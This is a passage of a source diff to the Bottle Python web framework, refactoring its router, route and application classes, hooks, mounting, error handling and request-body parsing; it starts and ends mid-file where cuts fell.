''' - path, targets, urlargs = environ['PATH_INFO'] or '/', None, {} - if path in self.static: - targets = self.static[path] - else: - for combined, rules in self.dynamic: - match = combined.match(path) - if not match: continue - getargs, targets = rules[match.lastindex - 1] - urlargs = getargs(path) if getargs else {} - break - - if not targets: - raise HTTPError(404, "Not found: " + repr(environ['PATH_INFO'])) - method = environ['REQUEST_METHOD'].upper() - if method in targets: - return targets[method], urlargs - if method == 'HEAD' and 'GET' in targets: - return targets['GET'], urlargs - if 'ANY' in targets: - return targets['ANY'], urlargs - allowed = [verb for verb in targets if verb != 'ANY'] - if 'GET' in allowed and 'HEAD' not in allowed: - allowed.append('HEAD') - raise HTTPError(405, "Method not allowed.", Allow=",".join(allowed)) + """ Return a (target, url_args) tuple or raise HTTPError(400/404/405). """ + verb = environ['REQUEST_METHOD'].upper() + path = environ['PATH_INFO'] or '/' + + methods = ('PROXY', 'HEAD', 'GET', 'ANY') if verb == 'HEAD' else ('PROXY', verb, 'ANY') + + for method in methods: + if method in self.static and path in self.static[method]: + target, getargs = self.static[method][path] + return target, getargs(path) if getargs else {} + elif method in self.dyna_regexes: + for combined, rules in self.dyna_regexes[method]: + match = combined(path) + if match: + target, getargs = rules[match.lastindex - 1] + return target, getargs(path) if getargs else {} + + # No matching route found. Collect alternative methods for 405 response + allowed = set([]) + nocheck = set(methods) + for method in set(self.static) - nocheck: + if path in self.static[method]: + allowed.add(method) + for method in set(self.dyna_regexes) - allowed - nocheck: + for combined, rules in self.dyna_regexes[method]: + match = combined(path) + if match: + allowed.add(method) + if allowed: + allow_header = ",".join(sorted(allowed)) + raise HTTPError(405, "Method not allowed.", Allow=allow_header) + + # No matching route and no alternative method found. We give up + raise HTTPError(404, "Not found: " + repr(path)) class Route(object): - ''' This class wraps a route callback along with route specific metadata and + """ This class wraps a route callback along with route specific metadata and configuration and applies Plugins on demand. It is also responsible for - turing an URL path rule into a regular expression usable by the Router. - ''' + turning an URL path rule into a regular expression usable by the Router. + """ - def __init__(self, app, rule, method, callback, name=None, - plugins=None, skiplist=None, **config): + def __init__(self, app, rule, method, callback, + name=None, + plugins=None, + skiplist=None, **config): #: The application this route is installed to. self.app = app - #: The path-rule string (e.g. ``/wiki/:page``). + #: The path-rule string (e.g. ``/wiki/<page>``). self.rule = rule #: The HTTP method as a string (e.g. ``GET``). self.method = method @@ -435,38 +526,26 @@ def __init__(self, app, rule, method, callback, name=None, #: Additional keyword arguments passed to the :meth:`Bottle.route` #: decorator are stored in this dictionary. Used for route-specific #: plugin configuration and meta-data. - self.config = ConfigDict(config) - - def __call__(self, *a, **ka): - depr("Some APIs changed to return Route() instances instead of"\ - " callables. 
Make sure to use the Route.call method and not to"\ - " call Route instances directly.") - return self.call(*a, **ka) + self.config = app.config._make_overlay() + self.config.load_dict(config) @cached_property def call(self): - ''' The route callback with all plugins applied. This property is - created on demand and then cached to speed up subsequent requests.''' + """ The route callback with all plugins applied. This property is + created on demand and then cached to speed up subsequent requests.""" return self._make_callback() def reset(self): - ''' Forget any cached values. The next time :attr:`call` is accessed, - all plugins are re-applied. ''' + """ Forget any cached values. The next time :attr:`call` is accessed, + all plugins are re-applied. """ self.__dict__.pop('call', None) def prepare(self): - ''' Do all on-demand work immediately (useful for debugging).''' + """ Do all on-demand work immediately (useful for debugging).""" self.call - @property - def _context(self): - depr('Switch to Plugin API v2 and access the Route object directly.') - return dict(rule=self.rule, method=self.method, callback=self.callback, - name=self.name, app=self.app, config=self.config, - apply=self.plugins, skip=self.skiplist) - def all_plugins(self): - ''' Yield all Plugins affecting this route. ''' + """ Yield all Plugins affecting this route. """ unique = set() for p in reversed(self.app.plugins + self.plugins): if True in self.skiplist: break @@ -481,24 +560,51 @@ def _make_callback(self): for plugin in self.all_plugins(): try: if hasattr(plugin, 'apply'): - api = getattr(plugin, 'api', 1) - context = self if api > 1 else self._context - callback = plugin.apply(callback, context) + callback = plugin.apply(callback, self) else: callback = plugin(callback) - except RouteReset: # Try again with changed configuration. + except RouteReset: # Try again with changed configuration. return self._make_callback() - if not callback is self.callback: + if callback is not self.callback: update_wrapper(callback, self.callback) return callback - def __repr__(self): - return '<%s %r %r>' % (self.method, self.rule, self.callback) - - - - + def get_undecorated_callback(self): + """ Return the callback. If the callback is a decorated function, try to + recover the original function. """ + func = self.callback + while True: + if getattr(func, '__wrapped__', False): + func = func.__wrapped__ + elif getattr(func, '__func__', False): + func = func.__func__ + elif getattr(func, '__closure__', False): + cells_values = (cell.cell_contents for cell in func.__closure__) + isfunc = lambda x: isinstance(x, FunctionType) or hasattr(x, '__call__') + func = next(iter(filter(isfunc, cells_values)), func) + else: + break + return func + + def get_callback_args(self): + """ Return a list of argument names the callback (most likely) accepts + as keyword arguments. If the callback is a decorated function, try + to recover the original function before inspection. """ + return getargspec(self.get_undecorated_callback())[0] + + def get_config(self, key, default=None): + """ Lookup a config field and return its value, first checking the + route.config, then route.app.config.""" + depr(0, 13, "Route.get_config() is deprecated.", + "The Route.config property already includes values from the" + " application config for missing keys. 
Access it directly.") + return self.config.get(key, default) + def __repr__(self): + cb = self.get_undecorated_callback() + return '<%s %s -> %s:%s>' % ( + self.method, self.rule, cb.__module__, getattr(cb, '__name__', '__call__') + ) ############################################################################### # Application Object ########################################################### @@ -514,66 +620,127 @@ class Bottle(object): let debugging middleware handle exceptions. """ - def __init__(self, catchall=True, autojson=True): - #: If true, most exceptions are caught and returned as :exc:`HTTPError` - self.catchall = catchall + @lazy_attribute + def _global_config(cls): + cfg = ConfigDict() + cfg.meta_set('catchall', 'validate', bool) + return cfg + + def __init__(self, **kwargs): + #: A :class:`ConfigDict` for app specific configuration. + self.config = self._global_config._make_overlay() + self.config._add_change_listener( + functools.partial(self.trigger_hook, 'config')) + + self.config.update({ + "catchall": True + }) + + if kwargs.get('catchall') is False: + depr(0, 13, "Bottle(catchall) keyword argument.", + "The 'catchall' setting is now part of the app " + "configuration. Fix: `app.config['catchall'] = False`") + self.config['catchall'] = False + if kwargs.get('autojson') is False: + depr(0, 13, "Bottle(autojson) keyword argument.", + "The 'autojson' setting is now part of the app " + "configuration. Fix: `app.config['json.enable'] = False`") + self.config['json.disable'] = True + + self._mounts = [] #: A :class:`ResourceManager` for application files self.resources = ResourceManager() - #: A :class:`ConfigDict` for app specific configuration. - self.config = ConfigDict() - self.config.autojson = autojson - - self.routes = [] # List of installed :class:`Route` instances. - self.router = Router() # Maps requests to :class:`Route` instances. + self.routes = [] # List of installed :class:`Route` instances. + self.router = Router() # Maps requests to :class:`Route` instances. self.error_handler = {} # Core plugins - self.plugins = [] # List of installed plugins. - self.hooks = HooksPlugin() - self.install(self.hooks) - if self.config.autojson: - self.install(JSONPlugin()) + self.plugins = [] # List of installed plugins. + self.install(JSONPlugin()) self.install(TemplatePlugin()) + #: If true, most exceptions are caught and returned as :exc:`HTTPError` + catchall = DictProperty('config', 'catchall') - def mount(self, prefix, app, **options): - ''' Mount an application (:class:`Bottle` or plain WSGI) to a specific - URL prefix. Example:: + __hook_names = 'before_request', 'after_request', 'app_reset', 'config' + __hook_reversed = {'after_request'} - root_app.mount('/admin/', admin_app) + @cached_property + def _hooks(self): + return dict((name, []) for name in self.__hook_names) + + def add_hook(self, name, func): + """ Attach a callback to a hook. Three hooks are currently implemented: + + before_request + Executed once before each request. The request context is + available, but no routing has happened yet. + after_request + Executed once after each request regardless of its outcome. + app_reset + Called whenever :meth:`Bottle.reset` is called. + """ + if name in self.__hook_reversed: + self._hooks[name].insert(0, func) + else: + self._hooks[name].append(func) - :param prefix: path prefix or `mount-point`. If it ends in a slash, - that slash is mandatory. - :param app: an instance of :class:`Bottle` or a WSGI application. 
+ def remove_hook(self, name, func): + """ Remove a callback from a hook. """ + if name in self._hooks and func in self._hooks[name]: + self._hooks[name].remove(func) + return True - All other parameters are passed to the underlying :meth:`route` call. - ''' - if isinstance(app, basestring): - prefix, app = app, prefix - depr('Parameter order of Bottle.mount() changed.') # 0.10 + def trigger_hook(self, __name, *args, **kwargs): + """ Trigger a hook and return a list of results. """ + return [hook(*args, **kwargs) for hook in self._hooks[__name][:]] + + def hook(self, name): + """ Return a decorator that attaches a callback to a hook. See + :meth:`add_hook` for details.""" + + def decorator(func): + self.add_hook(name, func) + return func + + return decorator + def _mount_wsgi(self, prefix, app, **options): segments = [p for p in prefix.split('/') if p] - if not segments: raise ValueError('Empty path prefix.') + if not segments: + raise ValueError('WSGI applications cannot be mounted to "/".') path_depth = len(segments) def mountpoint_wrapper(): try: request.path_shift(path_depth) - rs = BaseResponse([], 200) - def start_response(status, header): + rs = HTTPResponse([]) + + def start_response(status, headerlist, exc_info=None): + if exc_info: + _raise(*exc_info) + if py3k: + # Errors here mean that the mounted WSGI app did not + # follow PEP-3333 (which requires latin1) or used a + # pre-encoding other than utf8 :/ + status = status.encode('latin1').decode('utf8') + headerlist = [(k, v.encode('latin1').decode('utf8')) + for (k, v) in headerlist] rs.status = status - for name, value in header: rs.add_header(name, value) + for name, value in headerlist: + rs.add_header(name, value) return rs.body.append + body = app(request.environ, start_response) - body = itertools.chain(rs.body, body) - return HTTPResponse(body, rs.status_code, **rs.headers) + rs.body = itertools.chain(rs.body, body) if rs.body else body + return rs finally: request.path_shift(-path_depth) options.setdefault('skip', True) - options.setdefault('method', 'ANY') + options.setdefault('method', 'PROXY') options.setdefault('mountpoint', {'prefix': prefix, 'target': app}) options['callback'] = mountpoint_wrapper @@ -581,21 +748,74 @@ def start_response(status, header): if not prefix.endswith('/'): self.route('/' + '/'.join(segments), **options) + def _mount_app(self, prefix, app, **options): + if app in self._mounts or '_mount.app' in app.config: + depr(0, 13, "Application mounted multiple times. Falling back to WSGI mount.", + "Clone application before mounting to a different location.") + return self._mount_wsgi(prefix, app, **options) + + if options: + depr(0, 13, "Unsupported mount options. Falling back to WSGI mount.", + "Do not specify any route options when mounting bottle application.") + return self._mount_wsgi(prefix, app, **options) + + if not prefix.endswith("/"): + depr(0, 13, "Prefix must end in '/'. Falling back to WSGI mount.", + "Consider adding an explicit redirect from '/prefix' to '/prefix/' in the parent application.") + return self._mount_wsgi(prefix, app, **options) + + self._mounts.append(app) + app.config['_mount.prefix'] = prefix + app.config['_mount.app'] = self + for route in app.routes: + route.rule = prefix + route.rule.lstrip('/') + self.add_route(route) + + def mount(self, prefix, app, **options): + """ Mount an application (:class:`Bottle` or plain WSGI) to a specific + URL prefix. Example:: + + parent_app.mount('/prefix/', child_app) + + :param prefix: path prefix or `mount-point`. 
+ :param app: an instance of :class:`Bottle` or a WSGI application. + + Plugins from the parent application are not applied to the routes + of the mounted child application. If you need plugins in the child + application, install them separately. + + While it is possible to use path wildcards within the prefix path + (:class:`Bottle` childs only), it is highly discouraged. + + The prefix path must end with a slash. If you want to access the + root of the child application via `/prefix` in addition to + `/prefix/`, consider adding a route with a 307 redirect to the + parent application. + """ + + if not prefix.startswith('/'): + raise ValueError("Prefix must start with '/'") + + if isinstance(app, Bottle): + return self._mount_app(prefix, app, **options) + else: + return self._mount_wsgi(prefix, app, **options) + def merge(self, routes): - ''' Merge the routes of another :class:`Bottle` application or a list of + """ Merge the routes of another :class:`Bottle` application or a list of :class:`Route` objects into this application. The routes keep their 'owner', meaning that the :data:`Route.app` attribute is not - changed. ''' + changed. """ if isinstance(routes, Bottle): routes = routes.routes for route in routes: self.add_route(route) def install(self, plugin): - ''' Add a plugin to the list of plugins and prepare it for being + """ Add a plugin to the list of plugins and prepare it for being applied to all routes of this application. A plugin may be a simple decorator or an object that implements the :class:`Plugin` API. - ''' + """ if hasattr(plugin, 'setup'): plugin.setup(self) if not callable(plugin) and not hasattr(plugin, 'apply'): raise TypeError("Plugins must be callable or implement .apply()") @@ -604,10 +824,10 @@ def install(self, plugin): return plugin def uninstall(self, plugin): - ''' Uninstall plugins. Pass an instance to remove a specific plugin, a type + """ Uninstall plugins. Pass an instance to remove a specific plugin, a type object to remove all plugins that match that type, a string to remove all plugins with a matching ``name`` attribute or ``True`` to remove all - plugins. Return the list of removed plugins. ''' + plugins. Return the list of removed plugins. """ removed, remove = [], plugin for i, plugin in list(enumerate(self.plugins))[::-1]: if remove is True or remove is plugin or remove is type(plugin) \ @@ -618,30 +838,31 @@ def uninstall(self, plugin): if removed: self.reset() return removed - def run(self, **kwargs): - ''' Calls :func:`run` with the same parameters. ''' - run(self, **kwargs) - def reset(self, route=None): - ''' Reset all routes (force plugins to be re-applied) and clear all + """ Reset all routes (force plugins to be re-applied) and clear all caches. If an ID or route object is given, only that specific route - is affected. ''' + is affected. """ if route is None: routes = self.routes elif isinstance(route, Route): routes = [route] else: routes = [self.routes[route]] - for route in routes: route.reset() + for route in routes: + route.reset() if DEBUG: - for route in routes: route.prepare() - self.hooks.trigger('app_reset') + for route in routes: + route.prepare() + self.trigger_hook('app_reset') def close(self): - ''' Close the application and all installed plugins. ''' + """ Close the application and all installed plugins. """ for plugin in self.plugins: if hasattr(plugin, 'close'): plugin.close() - self.stopped = True + + def run(self, **kwargs): + """ Calls :func:`run` with the same parameters. 
""" + run(self, **kwargs) def match(self, environ): - """ Search for a matching route and return a (:class:`Route` , urlargs) + """ Search for a matching route and return a (:class:`Route`, urlargs) tuple. The second value is a dictionary with parameters extracted from the URL. Raise :exc:`HTTPError` (404/405) on a non-match.""" return self.router.match(environ) @@ -653,21 +874,26 @@ def get_url(self, routename, **kargs): return urljoin(urljoin('/', scriptname), location) def add_route(self, route): - ''' Add a route object, but do not change the :data:`Route.app` - attribute.''' + """ Add a route object, but do not change the :data:`Route.app` + attribute.""" self.routes.append(route) self.router.add(route.rule, route.method, route, name=route.name) if DEBUG: route.prepare() - def route(self, path=None, method='GET', callback=None, name=None, - apply=None, skip=None, **config): + def route(self, + path=None, + method='GET', + callback=None, + name=None, + apply=None, + skip=None, **config): """ A decorator to bind a function to a request URL. Example:: - @app.route('/hello/:name') + @app.route('/hello/<name>') def hello(name): return 'Hello %s' % name - The ``:name`` part is a wildcard. See :class:`Router` for syntax + The ``<name>`` part is a wildcard. See :class:`Router` for syntax details. :param path: Request path or a list of paths to listen to. If no @@ -689,16 +915,19 @@ def hello(name): if callable(path): path, callback = None, path plugins = makelist(apply) skiplist = makelist(skip) + def decorator(callback): - # TODO: Documentation and tests if isinstance(callback, basestring): callback = load(callback) for rule in makelist(path) or yieldroutes(callback): for verb in makelist(method): verb = verb.upper() - route = Route(self, rule, verb, callback, name=name, - plugins=plugins, skiplist=skiplist, **config) + route = Route(self, rule, verb, callback, + name=name, + plugins=plugins, + skiplist=skiplist, **config) self.add_route(route) return callback + return decorator(callback) if callback else decorator def get(self, path=None, method='GET', **options): @@ -717,62 +946,84 @@ def delete(self, path=None, method='DELETE', **options): """ Equals :meth:`route` with a ``DELETE`` method parameter. """ return self.route(path, method, **options) - def error(self, code=500): - """ Decorator: Register an output handler for a HTTP error code""" - def wrapper(handler): - self.error_handler[int(code)] = handler - return handler - return wrapper + def patch(self, path=None, method='PATCH', **options): + """ Equals :meth:`route` with a ``PATCH`` method parameter. """ + return self.route(path, method, **options) - def hook(self, name): - """ Return a decorator that attaches a callback to a hook. Three hooks - are currently implemented: + def error(self, code=500, callback=None): + """ Register an output handler for a HTTP error code. Can + be used as a decorator or called directly :: - - before_request: Executed once before each request - - after_request: Executed once after each request - - app_reset: Called whenever :meth:`reset` is called. - """ - def wrapper(func): - self.hooks.add(name, func) - return func - return wrapper + def error_handler_500(error): + return 'error_handler_500' + + app.error(code=500, callback=error_handler_500) + + @app.error(404) + def error_handler_404(error): + return 'error_handler_404' - def handle(self, path, method='GET'): - """ (deprecated) Execute the first matching route callback and return - the result. :exc:`HTTPResponse` exceptions are caught and returned. 
- If :attr:`Bottle.catchall` is true, other exceptions are caught as - well and returned as :exc:`HTTPError` instances (500). """ - depr("This method will change semantics in 0.10. Try to avoid it.") - if isinstance(path, dict): - return self._handle(path) - return self._handle({'PATH_INFO': path, 'REQUEST_METHOD': method.upper()}) + + def decorator(callback): + if isinstance(callback, basestring): callback = load(callback) + self.error_handler[int(code)] = callback + return callback + + return decorator(callback) if callback else decorator def default_error_handler(self, res): - return tob(template(ERROR_PAGE_TEMPLATE, e=res)) + return tob(template(ERROR_PAGE_TEMPLATE, e=res, template_settings=dict(name='__ERROR_PAGE_TEMPLATE'))) def _handle(self, environ): + path = environ['bottle.raw_path'] = environ['PATH_INFO'] + if py3k: + environ['PATH_INFO'] = path.encode('latin1').decode('utf8', 'ignore') + + environ['bottle.app'] = self + request.bind(environ) + response.bind() + try: - environ['bottle.app'] = self - request.bind(environ) - response.bind() - route, args = self.router.match(environ) - environ['route.handle'] = route - environ['bottle.route'] = route - environ['route.url_args'] = args - return route.call(**args) - except HTTPResponse: - return _e() - except RouteReset: - route.reset() - return self._handle(environ) + while True: # Remove in 0.14 together with RouteReset + out = None + try: + self.trigger_hook('before_request') + route, args = self.router.match(environ) + environ['route.handle'] = route + environ['bottle.route'] = route + environ['route.url_args'] = args + out = route.call(**args) + break + except HTTPResponse as E: + out = E + break + except RouteReset: + depr(0, 13, "RouteReset exception deprecated", + "Call route.call() after route.reset() and " + "return the result.") + route.reset() + continue + finally: + if isinstance(out, HTTPResponse): + out.apply(response) + try: + self.trigger_hook('after_request') + except HTTPResponse as E: + out = E + out.apply(response) except (KeyboardInterrupt, SystemExit, MemoryError): raise - except Exception: + except Exception as E: if not self.catchall: raise stacktrace = format_exc() environ['wsgi.errors'].write(stacktrace) - return HTTPError(500, "Internal Server Error", _e(), stacktrace) + environ['wsgi.errors'].flush() + environ['bottle.exc_info'] = sys.exc_info() + out = HTTPError(500, "Internal Server Error", E, stacktrace) + out.apply(response) + + return out def _cast(self, out, peek=None): """ Try to convert the parameter into something WSGI compatible and set @@ -789,7 +1040,7 @@ def _cast(self, out, peek=None): # Join lists of byte or unicode strings. Mixed lists are NOT supported if isinstance(out, (tuple, list))\ and isinstance(out[0], (bytes, unicode)): - out = out[0][0:0].join(out) # b'abc'[0:0] -> b'' + out = out[0][0:0].join(out) # b'abc'[0:0] -> b'' # Encode unicode strings if isinstance(out, unicode): out = out.encode(response.charset) @@ -802,7 +1053,8 @@ def _cast(self, out, peek=None): # TODO: Handle these explicitly in handle() or make them iterable. 
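# Editor's note (illustrative sketch, not part of the patch): registering the
# 'before_request' and 'after_request' hooks that _handle() above triggers
# around each request, using the hook() decorator introduced earlier in this
# hunk. The hook bodies and the header value are made-up examples.
from bottle import Bottle, request, response

app = Bottle()

@app.hook('before_request')
def normalise_path():
    # Runs before routing; the request context is already bound, so changes
    # to PATH_INFO still influence the route match.
    request.environ['PATH_INFO'] = request.environ['PATH_INFO'].rstrip('/') or '/'

@app.hook('after_request')
def add_security_header():
    # Runs after every request, regardless of its outcome.
    response.set_header('X-Content-Type-Options', 'nosniff')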
if isinstance(out, HTTPError): out.apply(response) - out = self.error_handler.get(out.status_code, self.default_error_handler)(out) + out = self.error_handler.get(out.status_code, + self.default_error_handler)(out) return self._cast(out) if isinstance(out, HTTPResponse): out.apply(response) @@ -823,13 +1075,13 @@ def _cast(self, out, peek=None): first = next(iout) except StopIteration: return self._cast('') - except HTTPResponse: - first = _e() + except HTTPResponse as E: + first = E except (KeyboardInterrupt, SystemExit, MemoryError): raise - except Exception: + except Exception as error: if not self.catchall: raise - first = HTTPError(500, 'Unhandled exception', _e(), format_exc()) + first = HTTPError(500, 'Unhandled exception', error, format_exc()) # These are the inner types allowed in iterator or generator objects. if isinstance(first, HTTPResponse): @@ -843,8 +1095,7 @@ def _cast(self, out, peek=None): msg = 'Unsupported response type: %s' % type(first) return self._cast(HTTPError(500, msg)) if hasattr(out, 'close'): - new_iter = _iterchain(new_iter) - new_iter.close = out.close + new_iter = _closeiter(new_iter, out.close) return new_iter def wsgi(self, environ, start_response): @@ -856,31 +1107,43 @@ def wsgi(self, environ, start_response): or environ['REQUEST_METHOD'] == 'HEAD': if hasattr(out, 'close'): out.close() out = [] - start_response(response._status_line, response.headerlist) + exc_info = environ.get('bottle.exc_info') + if exc_info is not None: + del environ['bottle.exc_info'] + start_response(response._wsgi_status_line(), response.headerlist, exc_info) return out except (KeyboardInterrupt, SystemExit, MemoryError): raise - except Exception: + except Exception as E: if not self.catchall: raise err = '<h1>Critical error while processing request: %s</h1>' \ % html_escape(environ.get('PATH_INFO', '/')) if DEBUG: err += '<h2>Error:</h2>\n<pre>\n%s\n</pre>\n' \ '<h2>Traceback:</h2>\n<pre>\n%s\n</pre>\n' \ - % (html_escape(repr(_e())), html_escape(format_exc())) + % (html_escape(repr(E)), html_escape(format_exc())) environ['wsgi.errors'].write(err) + environ['wsgi.errors'].flush() headers = [('Content-Type', 'text/html; charset=UTF-8')] - start_response('500 INTERNAL SERVER ERROR', headers) + start_response('500 INTERNAL SERVER ERROR', headers, sys.exc_info()) return [tob(err)] def __call__(self, environ, start_response): - ''' Each instance of :class:'Bottle' is a WSGI application. ''' + """ Each instance of :class:'Bottle' is a WSGI application. """ return self.wsgi(environ, start_response) + def __enter__(self): + """ Use this application as default for all module-level shortcuts. """ + default_app.push(self) + return self + def __exit__(self, exc_type, exc_value, traceback): + default_app.pop() - - + def __setattr__(self, name, value): + if name in self.__dict__: + raise AttributeError("Attribute %s already defined. Plugin conflict?" % name) + object.__setattr__(self, name, value) ############################################################################### # HTTP and WSGI Tools ########################################################## @@ -896,12 +1159,10 @@ class BaseRequest(object): way to store and access request-specific data. """ - __slots__ = ('environ') + __slots__ = ('environ', ) #: Maximum size of memory buffer for :attr:`body` in bytes. MEMFILE_MAX = 102400 - #: Maximum number pr GET or POST parameters per request - MAX_PARAMS = 100 def __init__(self, environ=None): """ Wrap a WSGI environ dictionary. 
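# Editor's note (illustrative sketch, not part of the patch): the __enter__/
# __exit__ support added above lets an application temporarily become the
# target of the module-level shortcuts. The '/ping' route is a made-up
# example; behaviour assumes the default application stack from upstream Bottle.
import bottle

app = bottle.Bottle()

with app:
    # Inside the block, bottle.route() registers on 'app' instead of the
    # global default application.
    @bottle.route('/ping')
    def ping():
        return 'pong'

assert app.routes and app.routes[0].rule == '/ping'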
""" @@ -912,70 +1173,87 @@ def __init__(self, environ=None): @DictProperty('environ', 'bottle.app', read_only=True) def app(self): - ''' Bottle application handling this request. ''' + """ Bottle application handling this request. """ raise RuntimeError('This request is not connected to an application.') + @DictProperty('environ', 'bottle.route', read_only=True) + def route(self): + """ The bottle :class:`Route` object that matches this request. """ + raise RuntimeError('This request is not connected to a route.') + + @DictProperty('environ', 'route.url_args', read_only=True) + def url_args(self): + """ The arguments extracted from the URL. """ + raise RuntimeError('This request is not connected to a route.') + @property def path(self): - ''' The value of ``PATH_INFO`` with exactly one prefixed slash (to fix - broken clients and avoid the "empty path" edge case). ''' - return '/' + self.environ.get('PATH_INFO','').lstrip('/') + """ The value of ``PATH_INFO`` with exactly one prefixed slash (to fix + broken clients and avoid the "empty path" edge case). """ + return '/' + self.environ.get('PATH_INFO', '').lstrip('/') @property def method(self): - ''' The ``REQUEST_METHOD`` value as an uppercase string. ''' + """ The ``REQUEST_METHOD`` value as an uppercase string. """ return self.environ.get('REQUEST_METHOD', 'GET').upper() @DictProperty('environ', 'bottle.request.headers', read_only=True) def headers(self): - ''' A :class:`WSGIHeaderDict` that provides case-insensitive access to - HTTP request headers. ''' + """ A :class:`WSGIHeaderDict` that provides case-insensitive access to + HTTP request headers. """ return WSGIHeaderDict(self.environ) def get_header(self, name, default=None): - ''' Return the value of a request header, or a given default value. ''' + """ Return the value of a request header, or a given default value. """ return self.headers.get(name, default) @DictProperty('environ', 'bottle.request.cookies', read_only=True) def cookies(self): """ Cookies parsed into a :class:`FormsDict`. Signed cookies are NOT decoded. Use :meth:`get_cookie` if you expect signed cookies. """ - cookies = SimpleCookie(self.environ.get('HTTP_COOKIE','')) - cookies = list(cookies.values())[:self.MAX_PARAMS] + cookies = SimpleCookie(self.environ.get('HTTP_COOKIE', '')).values() return FormsDict((c.key, c.value) for c in cookies) - def get_cookie(self, key, default=None, secret=None): + def get_cookie(self, key, default=None, secret=None, digestmod=hashlib.sha256): """ Return the content of a cookie. To read a `Signed Cookie`, the `secret` must match the one used to create the cookie (see :meth:`BaseResponse.set_cookie`). If anything goes wrong (missing cookie or wrong signature), return a default value. """ value = self.cookies.get(key) - if secret and value: - dec = cookie_decode(value, secret) # (key, value) tuple or None - return dec[1] if dec and dec[0] == key else default + if secret: + # See BaseResponse.set_cookie for details on signed cookies. + if value and value.startswith('!') and '?' in value: + sig, msg = map(tob, value[1:].split('?', 1)) + hash = hmac.new(tob(secret), msg, digestmod=digestmod).digest() + if _lscmp(sig, base64.b64encode(hash)): + dst = pickle.loads(base64.b64decode(msg)) + if dst and dst[0] == key: + return dst[1] + return default return value or default @DictProperty('environ', 'bottle.request.query', read_only=True) def query(self): - ''' The :attr:`query_string` parsed into a :class:`FormsDict`. These + """ The :attr:`query_string` parsed into a :class:`FormsDict`. 
These values are sometimes called "URL arguments" or "GET parameters", but not to be confused with "URL wildcards" as they are provided by the - :class:`Router`. ''' + :class:`Router`. """ get = self.environ['bottle.get'] = FormsDict() pairs = _parse_qsl(self.environ.get('QUERY_STRING', '')) - for key, value in pairs[:self.MAX_PARAMS]: + for key, value in pairs: get[key] = value return get @DictProperty('environ', 'bottle.request.forms', read_only=True) def forms(self): """ Form values parsed from an `url-encoded` or `multipart/form-data` - encoded POST or PUT request body. The result is retuned as a + encoded POST or PUT request body. The result is returned as a :class:`FormsDict`. All keys and values are strings. File uploads are stored separately in :attr:`files`. """ forms = FormsDict() + forms.recode_unicode = self.POST.recode_unicode for name, item in self.POST.allitems(): - if not hasattr(item, 'filename'): + if not isinstance(item, FileUpload): forms[name] = item return forms @@ -992,52 +1270,103 @@ def params(self): @DictProperty('environ', 'bottle.request.files', read_only=True) def files(self): - """ File uploads parsed from an `url-encoded` or `multipart/form-data` - encoded POST or PUT request body. The values are instances of - :class:`cgi.FieldStorage`. The most important attributes are: - - filename - The filename, if specified; otherwise None; this is the client - side filename, *not* the file name on which it is stored (that's - a temporary file you don't deal with) - file - The file(-like) object from which you can read the data. - value - The value as a *string*; for file uploads, this transparently - reads the file every time you request the value. Do not do this - on big files. + """ File uploads parsed from `multipart/form-data` encoded POST or PUT + request body. The values are instances of :class:`FileUpload`. + """ files = FormsDict() + files.recode_unicode = self.POST.recode_unicode for name, item in self.POST.allitems(): - if hasattr(item, 'filename'): + if isinstance(item, FileUpload): files[name] = item return files @DictProperty('environ', 'bottle.request.json', read_only=True) def json(self): - ''' If the ``Content-Type`` header is ``application/json``, this - property holds the parsed content of the request body. Only requests - smaller than :attr:`MEMFILE_MAX` are processed to avoid memory - exhaustion. ''' - if 'application/json' in self.environ.get('CONTENT_TYPE', '') \ - and 0 < self.content_length < self.MEMFILE_MAX: - return json_loads(self.body.read(self.MEMFILE_MAX)) + """ If the ``Content-Type`` header is ``application/json`` or + ``application/json-rpc``, this property holds the parsed content + of the request body. Only requests smaller than :attr:`MEMFILE_MAX` + are processed to avoid memory exhaustion. + Invalid JSON raises a 400 error response. 
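# Editor's note (illustrative sketch, not part of the patch): consuming the
# lazily parsed request.json property described above. The '/api/items'
# route and the 'name' field are made up; a malformed JSON body now results
# in a 400 error instead of an unhandled exception.
from bottle import Bottle, request, HTTPError

app = Bottle()

@app.post('/api/items')
def create_item():
    data = request.json                  # None if the body is empty
    if not data or 'name' not in data:
        raise HTTPError(400, 'JSON object with a "name" field required')
    return {'created': data['name']}     # dicts are serialised by JSONPlugin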
+ """ + ctype = self.environ.get('CONTENT_TYPE', '').lower().split(';')[0] + if ctype in ('application/json', 'application/json-rpc'): + b = self._get_body_string(self.MEMFILE_MAX) + if not b: + return None + try: + return json_loads(b) + except (ValueError, TypeError): + raise HTTPError(400, 'Invalid JSON') return None - @DictProperty('environ', 'bottle.request.body', read_only=True) - def _body(self): + def _iter_body(self, read, bufsize): maxread = max(0, self.content_length) - stream = self.environ['wsgi.input'] - body = BytesIO() if maxread < self.MEMFILE_MAX else TemporaryFile(mode='w+b') - while maxread > 0: - part = stream.read(min(maxread, self.MEMFILE_MAX)) + while maxread: + part = read(min(maxread, bufsize)) if not part: break - body.write(part) + yield part maxread -= len(part) + + @staticmethod + def _iter_chunked(read, bufsize): + err = HTTPError(400, 'Error while parsing chunked transfer body.') + rn, sem, bs = tob('\r\n'), tob(';'), tob('') + while True: + header = read(1) + while header[-2:] != rn: + c = read(1) + header += c + if not c: raise err + if len(header) > bufsize: raise err + size, _, _ = header.partition(sem) + try: + maxread = int(tonat(size.strip()), 16) + except ValueError: + raise err + if maxread == 0: break + buff = bs + while maxread > 0: + if not buff: + buff = read(min(maxread, bufsize)) + part, buff = buff[:maxread], buff[maxread:] + if not part: raise err + yield part + maxread -= len(part) + if read(2) != rn: + raise err + + @DictProperty('environ', 'bottle.request.body', read_only=True) + def _body(self): + try: + read_func = self.environ['wsgi.input'].read + except KeyError: + self.environ['wsgi.input'] = BytesIO() + return self.environ['wsgi.input'] + body_iter = self._iter_chunked if self.chunked else self._iter_body + body, body_size, is_temp_file = BytesIO(), 0, False + for part in body_iter(read_func, self.MEMFILE_MAX): + body.write(part) + body_size += len(part) + if not is_temp_file and body_size > self.MEMFILE_MAX: + body, tmp = NamedTemporaryFile(mode='w+b'), body + body.write(tmp.getvalue()) + del tmp + is_temp_file = True self.environ['wsgi.input'] = body body.seek(0) return body + def _get_body_string(self, maxread): + """ Read body into a string. Raise HTTPError(413) on requests that are + too large. """ + if self.content_length > maxread: + raise HTTPError(413, 'Request entity too large') + data = self.body.read(maxread + 1) + if len(data) > maxread: + raise HTTPError(413, 'Request entity too large') + return data + @property def body(self): """ The HTTP request body as a seek-able file-like object. Depending on @@ -1048,6 +1377,12 @@ def body(self): self._body.seek(0) return self._body + @property + def chunked(self): + """ True if Chunked transfer 